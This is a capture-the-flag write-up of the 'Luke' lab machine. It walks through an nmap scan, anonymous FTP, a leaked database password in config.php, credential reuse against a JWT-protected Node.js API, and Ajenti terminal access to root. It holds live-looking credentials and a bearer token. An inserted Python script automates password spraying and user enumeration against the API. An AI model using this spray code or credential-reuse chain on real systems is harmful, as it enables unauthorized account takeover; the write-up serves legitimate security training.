Reconnaissance
As always, I started my attack by performing an nmap scan:
Nmap scan report for 10.10.10.137
Host is up (0.26s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3+ (ext.1)
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 0 0 512 Apr 14 12:35 webapp
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.48
| Logged in as ftp
| TYPE: ASCII
| No session upload bandwidth limit
| No session download bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3+ (ext.1) - secure, fast, stable
|_End of status
22/tcp open ssh?
80/tcp open http Apache httpd 2.4.38 ((FreeBSD) PHP/7.3.3)
| http-methods:
| Supported Methods: POST OPTIONS HEAD GET TRACE
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.38 (FreeBSD) PHP/7.3.3
|_http-title: Luke
3000/tcp open http Node.js Express framework
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
8000/tcp open http Ajenti http control panel
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Ajenti
Enumeration
We saw an open FTP port with anonymous login allowed, so let's connect to it with the ftp command:
We got a file called for_Chihiro.txt. Its contents are displayed below:
Dear Chihiro !!

As you told me that you wanted to learn Web Development and Frontend, I can give you a little push by showing the sources of the actual website I've created.

Normally you should know where to look but hurry up because I will delete them soon because of our security policies !

Derry
Nothing else on the FTP server is interesting, so let's move on to the website on port 80:
Yet again, nothing is interesting on this website, so let's search for hidden pages and directories using gobuster and dirb:
We can see that a config.php page is available. Let's access it; its contents are displayed below:
$dbHost = 'localhost';
$dbUsername = 'root';
$dbPassword = 'Zk6heYCyv6ZE9Xcg';
$db = "login";
$conn = new mysqli($dbHost, $dbUsername, $dbPassword, $db) or die("Connect failed: %s\n" . $conn->error);
We now have a set of credentials (root / Zk6heYCyv6ZE9Xcg for a local MySQL database named login). Let's set them aside, since we may be able to use them later.
Looking back at our previous nmap scan, we can see that there is a Node.js Express framework service on port 3000:
Let's issue a quick curl request against it:
Hmm. It seems that we need to supply a JWT auth token to use this endpoint. Let's try the only set of creds we have for now:
...it didn't work.
At this point, I formed a hypothesis that this might be another case of credential re-use, so I tried to authenticate with several usernames and the password we already have (Zk6heYCyv6ZE9Xcg), and got a hit on the username admin:
Bingo!
Now that we have a usable credential and the JWT it gives us, we can enumerate the users known to the endpoint:
We have the following user-role pairs:
- Admin — Superuser
- Derry — Web Admin
- Yuri — Beta Tester
- Dory — Supporter
Supplying the command below, substituting each username for <name>, returns the username-password pair for that user:
curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4NjEyNTU3LCJleHAiOjE1Njg2OTg5NTd9.9vap7KxTwdnfDiTSdBDl2dzLGTeH8s4rTr47Eus8lZw' http://10.10.10.137:3000/users/<name>
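As an added example (not code from the original writeup), the script below automates the two steps described above: the password spray against the port 3000 API that found the admin account, and the per-user lookups against /users/<name> with the resulting bearer token. It also decodes the JWT shown in the curl command above without verifying it, which is a quick way to see who a token is issued to and how long it stays valid. The login path (/login), the form field names (username, password) and the JSON key that carries the token ("token") are assumptions; the writeup does not show the login request. The HTTP calls are injectable so the logic can be exercised offline.

```python
"""Added example, not from the original writeup.

Assumptions (the page does not show them): the Express API accepts
POST /login with form fields username/password and answers a JSON body
whose "token" key holds the JWT; /users/<name> answers 200 with JSON.
"""
import base64
import json
import urllib.error
import urllib.parse
import urllib.request
from datetime import datetime, timezone

BASE = "http://10.10.10.137:3000"

# Token copied from the writeup's curl command above.
ADMIN_TOKEN = (
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4NjEyNTU3LCJleHAiOjE1Njg2OTg5NTd9."
    "9vap7KxTwdnfDiTSdBDl2dzLGTeH8s4rTr47Eus8lZw"
)


def b64url_decode(segment):
    """Decode one base64url segment, restoring the padding JWTs strip."""
    segment += "=" * (-len(segment) % 4)
    return base64.urlsafe_b64decode(segment)


def decode_jwt_unverified(token):
    """Return header, claims and lifetime WITHOUT checking the signature.

    Enough to see which user the token names and how long it is valid;
    it must never be used to decide whether to trust a token.
    """
    header_b64, payload_b64, _signature = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    claims = json.loads(b64url_decode(payload_b64))
    lifetime = claims.get("exp", 0) - claims.get("iat", 0)
    return {"header": header, "claims": claims, "lifetime_seconds": lifetime}


def _http_post_form(url, fields):
    """POST a urlencoded form; return (status, body) even on HTTP errors."""
    data = urllib.parse.urlencode(fields).encode()
    req = urllib.request.Request(url, data=data, method="POST")
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as e:
        return e.code, e.read()


def _http_get_bearer(url, token):
    """GET with an Authorization: Bearer header; return (status, body)."""
    req = urllib.request.Request(url, headers={"Authorization": "Bearer " + token})
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as e:
        return e.code, e.read()


def password_spray(usernames, password, post=_http_post_form, base=BASE):
    """Try ONE password against every username; return {user: token} for hits.

    One password across many users, rather than many passwords against one
    user, is what keeps a spray under typical lockout thresholds.
    """
    hits = {}
    for user in usernames:
        status, body = post(base + "/login", {"username": user, "password": password})
        if status != 200:
            continue
        try:
            token = json.loads(body).get("token")
        except ValueError:
            continue  # non-JSON answer, treat as a miss
        if token:
            hits[user] = token
    return hits


def enumerate_users(token, names, get=_http_get_bearer, base=BASE):
    """GET /users/<name> for each name; return the JSON of every 200 answer."""
    found = {}
    for name in names:
        status, body = get(base + "/users/" + name, token)
        if status == 200:
            found[name] = json.loads(body)
    return found


if __name__ == "__main__":
    info = decode_jwt_unverified(ADMIN_TOKEN)
    expires = datetime.fromtimestamp(info["claims"]["exp"], tz=timezone.utc)
    print(info["header"], info["claims"])
    print("valid for %dh, until %s" % (info["lifetime_seconds"] // 3600, expires))
    # Usernames come from the role listing above; the password from config.php.
    users = ["admin", "derry", "yuri", "dory"]
    for user, tok in password_spray(users, "Zk6heYCyv6ZE9Xcg").items():
        print(user, enumerate_users(tok, ["Admin", "Derry", "Yuri", "Dory"]))
```

Decoding the token from the writeup shows an HS256 header and the claims username=admin with exp minus iat equal to 86400, i.e. the API hands out tokens that stay valid for a full day, which is why a single captured token is enough to run the whole enumeration without logging in again.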
We now have 4 new sets of credentials!
Let's look for pages where we can use them. Looking back at our earlier directory scans, we can see that /management is present but returned the error code 401 (Unauthorized):
Browsing to 10.10.10.137/management confirms this with an HTTP authentication prompt:
Using a bit of inference here: we know that Derry gave the sources to Chihiro to show him the ropes with regard to web development, and we know from the user-role listing that Derry is the Web Admin. So for this authentication prompt, we'll use Derry's credentials.
Upon successful authentication, we can see this:
Inspecting config.json:
Taking note of the highlighted lines, we can see that config.json contains a username-password pair for a service bound to port 8000, which our nmap scan identified as the Ajenti control panel.
Upon authentication, this Ajenti dashboard is displayed:
Interesting: we can see that there is a Terminal plugin listed under Tools.
Exploitation
Spawning a new web-based Terminal gives us a shell from which we can read both user.txt and root.txt:
That’s it for this machine’s writeup!
— — — — — — — — — — — — — — — — — — — — — — — — — —
Hi I’m Mon, and I’m one of the founders of hackstreetboys, a CTF team from the Philippines!
While you’re at it, please like our Facebook page (facebook.com/hackstreetboys)
Follow our Twitter account (https://twitter.com/_hackstreetboys)
Read our writeups on Medium (https://medium.com/hackstreetboys)
Look at our new GitHub page (https://github.com/hackstreetboysph)
Check our website (https://hackstreetboys.ph)